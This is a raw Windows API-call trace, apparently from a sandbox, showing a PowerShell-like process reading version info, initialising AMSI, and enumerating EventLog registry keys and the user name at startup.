[0240.831] VerQueryValueW (in: pBlock=0x498c804, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\FileVersion", lplpBuffer=0x6a6f720, puLen=0x6a6f71c | out: lplpBuffer=0x6a6f720*=0x498c958, puLen=0x6a6f71c) returned 1 [0240.831] VerQueryValueW (in: pBlock=0x498c804, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\InternalName", lplpBuffer=0x6a6f720, puLen=0x6a6f71c | out: lplpBuffer=0x6a6f720*=0x498c9c0, puLen=0x6a6f71c) returned 1 [0240.831] VerQueryValueW (in: pBlock=0x498c804, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\LegalCopyright", lplpBuffer=0x6a6f720, puLen=0x6a6f71c | out: lplpBuffer=0x6a6f720*=0x498c9fc, puLen=0x6a6f71c) returned 1 [0240.831] VerQueryValueW (in: pBlock=0x498c804, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\OriginalFilename", lplpBuffer=0x6a6f720, puLen=0x6a6f71c | out: lplpBuffer=0x6a6f720*=0x498ca80, puLen=0x6a6f71c) returned 1 [0240.831] VerQueryValueW (in: pBlock=0x498c804, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\ProductName", lplpBuffer=0x6a6f720, puLen=0x6a6f71c | out: lplpBuffer=0x6a6f720*=0x498cac8, puLen=0x6a6f71c) returned 1 [0240.831] VerQueryValueW (in: pBlock=0x498c804, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\ProductVersion", lplpBuffer=0x6a6f720, puLen=0x6a6f71c | out: lplpBuffer=0x6a6f720*=0x498cb38, puLen=0x6a6f71c) returned 1 [0240.831] VerQueryValueW (in: pBlock=0x498c804, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\Comments", lplpBuffer=0x6a6f720, puLen=0x6a6f71c | out: lplpBuffer=0x6a6f720*=0x0, puLen=0x6a6f71c) returned 0 [0240.831] VerQueryValueW (in: pBlock=0x498c804, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\LegalTrademarks", lplpBuffer=0x6a6f720, puLen=0x6a6f71c | out: lplpBuffer=0x6a6f720*=0x0, puLen=0x6a6f71c) returned 0 [0240.831] VerQueryValueW (in: pBlock=0x498c804, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\PrivateBuild", lplpBuffer=0x6a6f720, puLen=0x6a6f71c | out: lplpBuffer=0x6a6f720*=0x0, puLen=0x6a6f71c) returned 0 [0240.831] VerQueryValueW (in: pBlock=0x498c804, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\SpecialBuild", lplpBuffer=0x6a6f720, puLen=0x6a6f71c | out: lplpBuffer=0x6a6f720*=0x0, puLen=0x6a6f71c) returned 0 [0240.831] VerQueryValueW (in: pBlock=0x498c804, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x6a6f714, puLen=0x6a6f710 | out: lplpBuffer=0x6a6f714*=0x498cb94, puLen=0x6a6f710) returned 1 [0240.831] VerLanguageNameW (in: wLang=0x409, szLang=0x6a6f4a4, cchLang=0x100 | out: szLang="English (United States)") returned 0x17 [0240.831] VerQueryValueW (in: pBlock=0x498c804, lpSubBlock="\\", lplpBuffer=0x6a6f724, puLen=0x6a6f720 | out: lplpBuffer=0x6a6f724*=0x498c82c, puLen=0x6a6f720) returned 1 [0240.844] AmsiInitialize () returned 0x0 [0241.653] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x6a6eeb0, nSize=0x80 | out: lpBuffer="֠琉\x03") returned 0x0 [0241.904] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x6a6eeb0, nSize=0x80 | out: lpBuffer="က煄˳") returned 0x0 [0242.392] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0242.441] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0242.488] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0242.534] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0242.581] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0242.628] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0242.676] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0242.722] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0242.769] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0242.816] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0242.863] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0242.910] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0242.958] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0243.035] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0243.081] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0243.129] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0243.175] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0243.222] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0243.347] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x6a6ee00, nSize=0x80 | out: lpBuffer="က澪က澪") returned 0x0 [0243.835] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x6a6eccc, nSize=0x80 | out: lpBuffer="ڦ籶玥ㄱက澪က澪") returned 0x0 [0243.914] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x6a6f5cc | out: phkResult=0x6a6f5cc*=0x674) returned 0x0 [0243.916] RegQueryInfoKeyW (in: hKey=0x674, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x6a6f61c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x6a6f618, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x6a6f61c*=0x8, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x6a6f618*=0x13, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0243.917] RegEnumKeyExW (in: hKey=0x674, dwIndex=0x0, lpName=0x4a9a468, lpcchName=0x6a6f638, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x6a6f638, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0243.917] RegEnumKeyExW (in: hKey=0x674, dwIndex=0x1, lpName=0x4a9a468, lpcchName=0x6a6f638, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x6a6f638, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0243.917] RegEnumKeyExW (in: hKey=0x674, dwIndex=0x2, lpName=0x4a9a468, lpcchName=0x6a6f638, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x6a6f638, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0243.917] RegEnumKeyExW (in: hKey=0x674, dwIndex=0x3, lpName=0x4a9a468, lpcchName=0x6a6f638, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x6a6f638, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0243.917] RegEnumKeyExW (in: hKey=0x674, dwIndex=0x4, lpName=0x4a9a468, lpcchName=0x6a6f638, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x6a6f638, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0243.917] RegEnumKeyExW (in: hKey=0x674, dwIndex=0x5, lpName=0x4a9a468, lpcchName=0x6a6f638, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x6a6f638, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0243.917] RegEnumKeyExW (in: hKey=0x674, dwIndex=0x6, lpName=0x4a9a468, lpcchName=0x6a6f638, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x6a6f638, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0243.917] RegEnumKeyExW (in: hKey=0x674, dwIndex=0x7, lpName=0x4a9a468, lpcchName=0x6a6f638, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x6a6f638, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0243.917] RegOpenKeyExW (in: hKey=0x674, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x6a6f5f8 | out: phkResult=0x6a6f5f8*=0x67c) returned 0x0 [0243.918] RegOpenKeyExW (in: hKey=0x67c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x6a6f5f8 | out: phkResult=0x6a6f5f8*=0x0) returned 0x2 [0243.918] RegCloseKey (hKey=0x67c) returned 0x0 [0243.918] RegOpenKeyExW (in: hKey=0x674, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x6a6f5f8 | out: phkResult=0x6a6f5f8*=0x67c) returned 0x0 [0243.918] RegOpenKeyExW (in: hKey=0x67c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x6a6f5f8 | out: phkResult=0x6a6f5f8*=0x0) returned 0x2 [0243.918] RegCloseKey (hKey=0x67c) returned 0x0 [0243.918] RegOpenKeyExW (in: hKey=0x674, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x6a6f5f8 | out: phkResult=0x6a6f5f8*=0x67c) returned 0x0 [0243.919] RegOpenKeyExW (in: hKey=0x67c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x6a6f5f8 | out: phkResult=0x6a6f5f8*=0x0) returned 0x2 [0243.919] RegCloseKey (hKey=0x67c) returned 0x0 [0243.919] RegOpenKeyExW (in: hKey=0x674, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x6a6f5f8 | out: phkResult=0x6a6f5f8*=0x67c) returned 0x0 [0243.919] RegOpenKeyExW (in: hKey=0x67c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x6a6f5f8 | out: phkResult=0x6a6f5f8*=0x0) returned 0x2 [0243.919] RegCloseKey (hKey=0x67c) returned 0x0 [0243.919] RegOpenKeyExW (in: hKey=0x674, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x6a6f5f8 | out: phkResult=0x6a6f5f8*=0x67c) returned 0x0 [0243.919] RegOpenKeyExW (in: hKey=0x67c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x6a6f5f8 | out: phkResult=0x6a6f5f8*=0x0) returned 0x2 [0243.919] RegCloseKey (hKey=0x67c) returned 0x0 [0243.920] RegOpenKeyExW (in: hKey=0x674, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x6a6f5f8 | out: phkResult=0x6a6f5f8*=0x67c) returned 0x0 [0243.920] RegOpenKeyExW (in: hKey=0x67c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x6a6f5f8 | out: phkResult=0x6a6f5f8*=0x0) returned 0x2 [0243.920] RegCloseKey (hKey=0x67c) returned 0x0 [0243.920] RegOpenKeyExW (in: hKey=0x674, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x6a6f5f8 | out: phkResult=0x6a6f5f8*=0x67c) returned 0x0 [0243.920] RegOpenKeyExW (in: hKey=0x67c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x6a6f5f8 | out: phkResult=0x6a6f5f8*=0x0) returned 0x2 [0243.920] RegCloseKey (hKey=0x67c) returned 0x0 [0243.920] RegOpenKeyExW (in: hKey=0x674, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x6a6f5f8 | out: phkResult=0x6a6f5f8*=0x67c) returned 0x0 [0243.921] RegOpenKeyExW (in: hKey=0x67c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x6a6f5f8 | out: phkResult=0x6a6f5f8*=0x684) returned 0x0 [0243.921] RegCloseKey (hKey=0x684) returned 0x0 [0243.921] RegCloseKey (hKey=0x674) returned 0x0 [0243.922] RegCloseKey (hKey=0x67c) returned 0x0 [0244.088] CoTaskMemAlloc (cb=0x804) returned 0x6dd9370 [0244.088] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x6dd9370, nSize=0x6a6f6f0 | out: lpNameBuffer="NQDPDE\\FD1HVy", nSize=0x6a6f6f0) returned 0x1 [0244.090] CoTaskMemFree (pv=0x6dd9370) [0244.091] GetUserNameW (in: lpBuffer=0x6a6f484, pcbBuffer=0x6a6f6fc | out: lpBuffer="FD1HVy", pcbBuffer=0x6a6f6fc) returned 1 [0244.353] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x6a6f5a0 | out: phkResult=0x6a6f5a0*=0x674) returned 0x0 [0244.354] RegQueryInfoKeyW (in: hKey=0x674, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x6a6f5f0, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x6a6f5ec, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x6a6f5f0*=0x8, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x6a6f5ec*=0x13, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0244.354] RegEnumKeyExW (in: hKey=0x674, dwIndex=0x0, lpName=0x4b1abd0, lpcchName=0x6a6f60c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x6a6f60c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0244.354] CoTaskMemFree (pv=0x0) [0244.354] RegEnumKeyExW (in: hKey=0x674, dwIndex=0x1, lpName=0x4b1abd0, lpcchName=0x6a6f60c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x6a6f60c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0244.354] CoTaskMemFree (pv=0x0) [0244.354] RegEnumKeyExW (in: hKey=0x674, dwIndex=0x2, lpName=0x4b1abd0, lpcchName=0x6a6f60c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x6a6f60c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0244.354] CoTaskMemFree (pv=0x0) [0244.354] RegEnumKeyExW (in: hKey=0x674, dwIndex=0x3, lpName=0x4b1abd0, lpcchName=0x6a6f60c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x6a6f60c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0244.354] CoTaskMemFree (pv=0x0) [0244.354] RegEnumKeyExW (in: hKey=0x674, dwIndex=0x4, lpName=0x4b1abd0, lpcchName=0x6a6f60c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x6a6f60c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0244.354] CoTaskMemFree (pv=0x0) [0244.354] RegEnumKeyExW (in: hKey=0x674, dwIndex=0x5, lpName=0x4b1abd0, lpcchName=0x6a6f60c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x6a6f60c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0244.354] CoTaskMemFree (pv=0x0) [0244.354] RegEnumKeyExW (in: hKey=0x674, dwIndex=0x6, lpName=0x4b1abd0, lpcchName=0x6a6f60c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x6a6f60c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0244.354] CoTaskMemFree (pv=0x0) [0244.354] RegEnumKeyExW (in: hKey=0x674, dwIndex=0x7, lpName=0x4b1abd0, lpcchName=0x6a6f60c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x6a6f60c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0244.355] CoTaskMemFree (pv=0x0) [0244.355] RegOpenKeyExW (in: hKey=0x674, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x6a6f5cc | out: phkResult=0x6a6f5cc*=0x684) returned 0x0 [0244.355] RegOpenKeyExW (in: hKey=0x684, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x6a6f5cc | out: phkResult=0x6a6f5cc*=0x0) returned 0x2 [0244.355] RegCloseKey (hKey=0x684) returned 0x0 [0244.355] RegOpenKeyExW (in: hKey=0x674, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x6a6f5cc | out: phkResult=0x6a6f5cc*=0x684) returned 0x0 [0244.355] RegOpenKeyExW (in: hKey=0x684, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x6a6f5cc | out: phkResult=0x6a6f5cc*=0x0) returned 0x2 [0244.355] RegCloseKey (hKey=0x684) returned 0x0 [0244.355] RegOpenKeyExW (in: hKey=0x674, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x6a6f5cc | out: phkResult=0x6a6f5cc*=0x684) returned 0x0 [0244.355] RegOpenKeyExW (in: hKey=0x684, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x6a6f5cc | out: phkResult=0x6a6f5cc*=0x0) returned 0x2 [0244.355] RegCloseKey (hKey=0x684) returned 0x0 [0244.356] RegOpenKeyExW (in: hKey=0x674, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x6a6f5cc | out: phkResult=0x6a6f5cc*=0x684) returned 0x0 [0244.356] RegOpenKeyExW (in: hKey=0x684, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x6a6f5cc | out: phkResult=0x6a6f5cc*=0x0) returned 0x2 [0244.356] RegCloseKey (hKey=0x684) returned 0x0 [0244.356] RegOpenKeyExW (in: hKey=0x674, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x6a6f5cc | out: phkResult=0x6a6f5cc*=0x684) returned 0x0 [0244.356] RegOpenKeyExW (in: hKey=0x684, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x6a6f5cc | out: phkResult=0x6a6f5cc*=0x0) returned 0x2 [0244.356] RegCloseKey (hKey=0x684) returned 0x0 [0244.356] RegOpenKeyExW (in: hKey=0x674, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x6a6f5cc | out: phkResult=0x6a6f5cc*=0x684) returned 0x0 [0244.356] RegOpenKeyExW (in: hKey=0x684, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x6a6f5cc | out: phkResult=0x6a6f5cc*=0x0) returned 0x2 [0244.356] RegCloseKey (hKey=0x684) returned 0x0 [0244.356] RegOpenKeyExW (in: hKey=0x674, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x6a6f5cc | out: phkResult=0x6a6f5cc*=0x684) returned 0x0 [0244.357] RegOpenKeyExW (in: hKey=0x684, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x6a6f5cc | out: phkResult=0x6a6f5cc*=0x0) returned 0x2 [0244.357] RegCloseKey (hKey=0x684) returned 0x0 [0244.357] RegOpenKeyExW (in: hKey=0x674, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x6a6f5cc | out: phkResult=0x6a6f5cc*=0x684) returned 0x0 [0244.357] RegOpenKeyExW (in: hKey=0x684, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x6a6f5cc | out: phkResult=0x6a6f5cc*=0x688) returned 0x0 [0244.357] RegCloseKey (hKey=0x688) returned 0x0 [0244.357] RegCloseKey (hKey=0x674) returned 0x0 [0244.358] RegCloseKey (hKey=0x684) returned 0x0 [0244.359] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x6a6f5ac | out: phkResult=0x6a6f5ac*=0x684) returned 0x0 [0244.359] RegQueryInfoKeyW (in: hKey=0x684, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x6a6f5fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x6a6f5f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x6a6f5fc*=0x8, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x6a6f5f8*=0x13, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0244.359] RegEnumKeyExW (in: hKey=0x684, dwIndex=0x0, lpName=0x4b1bbdc, lpcchName=0x6a6f618, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x6a6f618, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0244.359] CoTaskMemFree (pv=0x0) [0244.359] RegEnumKeyExW (in: hKey=0x684, dwIndex=0x1, lpName=0x4b1bbdc, lpcchName=0x6a6f618, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x6a6f618, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0244.359] CoTaskMemFree (pv=0x0) [0244.359] RegEnumKeyExW (in: hKey=0x684, dwIndex=0x2, lpName=0x4b1bbdc, lpcchName=0x6a6f618, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x6a6f618, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0244.360] CoTaskMemFree (pv=0x0) [0244.360] RegEnumKeyExW (in: hKey=0x684, dwIndex=0x3, lpName=0x4b1bbdc, lpcchName=0x6a6f618, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x6a6f618, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0244.360] CoTaskMemFree (pv=0x0) [0244.360] RegEnumKeyExW (in: hKey=0x684, dwIndex=0x4, lpName=0x4b1bbdc, lpcchName=0x6a6f618, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x6a6f618, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0244.360] CoTaskMemFree (pv=0x0) [0244.360] RegEnumKeyExW (in: hKey=0x684, dwIndex=0x5, lpName=0x4b1bbdc, lpcchName=0x6a6f618, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x6a6f618, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0244.360] CoTaskMemFree (pv=0x0) [0244.360] RegEnumKeyExW (in: hKey=0x684, dwIndex=0x6, lpName=0x4b1bbdc, lpcchName=0x6a6f618, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x6a6f618, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0244.360] CoTaskMemFree (pv=0x0) [0244.360] RegEnumKeyExW (in: hKey=0x684, dwIndex=0x7, lpName=0x4b1bbdc, lpcchName=0x6a6f618, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x6a6f618, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0244.360] CoTaskMemFree (pv=0x0) [0244.360] RegOpenKeyExW (in: hKey=0x684, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x6a6f5d8 | out: phkResult=0x6a6f5d8*=0x674) returned 0x0 [0244.360] RegOpenKeyExW (in: hKey=0x674, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x6a6f5d8 | out: phkResult=0x6a6f5d8*=0x0) returned 0x2 [0244.360] RegCloseKey (hKey=0x674) returned 0x0 [0244.360] RegOpenKeyExW (in: hKey=0x684, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x6a6f5d8 | out: phkResult=0x6a6f5d8*=0x674) returned 0x0 [0244.361] RegOpenKeyExW (in: hKey=0x674, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x6a6f5d8 | out: phkResult=0x6a6f5d8*=0x0) returned 0x2 [0244.361] RegCloseKey (hKey=0x674) returned 0x0 [0244.361] RegOpenKeyExW (in: hKey=0x684, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x6a6f5d8 | out: phkResult=0x6a6f5d8*=0x674) returned 0x0 [0244.361] RegOpenKeyExW (in: hKey=0x674, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x6a6f5d8 | out: phkResult=0x6a6f5d8*=0x0) returned 0x2 [0244.361] RegCloseKey (hKey=0x674) returned 0x0 [0244.361] RegOpenKeyExW (in: hKey=0x684, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x6a6f5d8 | out: phkResult=0x6a6f5d8*=0x674) returned 0x0 [0244.361] RegOpenKeyExW (in: hKey=0x674, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x6a6f5d8 | out: phkResult=0x6a6f5d8*=0x0) returned 0x2 [0244.361] RegCloseKey (hKey=0x674) returned 0x0 [0244.361] RegOpenKeyExW (in: hKey=0x684, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x6a6f5d8 | out: phkResult=0x6a6f5d8*=0x674) returned 0x0 [0244.361] RegOpenKeyExW (in: hKey=0x674, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x6a6f5d8 | out: phkResult=0x6a6f5d8*=0x0) returned 0x2 [0244.361] RegCloseKey (hKey=0x674) returned 0x0 [0244.362] RegOpenKeyExW (in: hKey=0x684, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x6a6f5d8 | out: phkResult=0x6a6f5d8*=0x674) returned 0x0 [0244.362] RegOpenKeyExW (in: hKey=0x674, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x6a6f5d8 | out: phkResult=0x6a6f5d8*=0x0) returned 0x2 [0244.362] RegCloseKey (hKey=0x674) returned 0x0 [0244.362] RegOpenKeyExW (in: hKey=0x684, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x6a6f5d8 | out: phkResult=0x6a6f5d8*=0x674) returned 0x0 [0244.362] RegOpenKeyExW (in: hKey=0x674, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x6a6f5d8 | out: phkResult=0x6a6f5d8*=0x0) returned 0x2 [0244.362] RegCloseKey (hKey=0x674) returned 0x0 [0244.410] RegOpenKeyExW (in: hKey=0x684, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x6a6f5d8 | out: phkResult=0x6a6f5d8*=0x674) returned 0x0 [0244.410] RegOpenKeyExW (in: hKey=0x674, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x6a6f5d8 | out: phkResult=0x6a6f5d8*=0x688) returned 0x0 [0244.410] 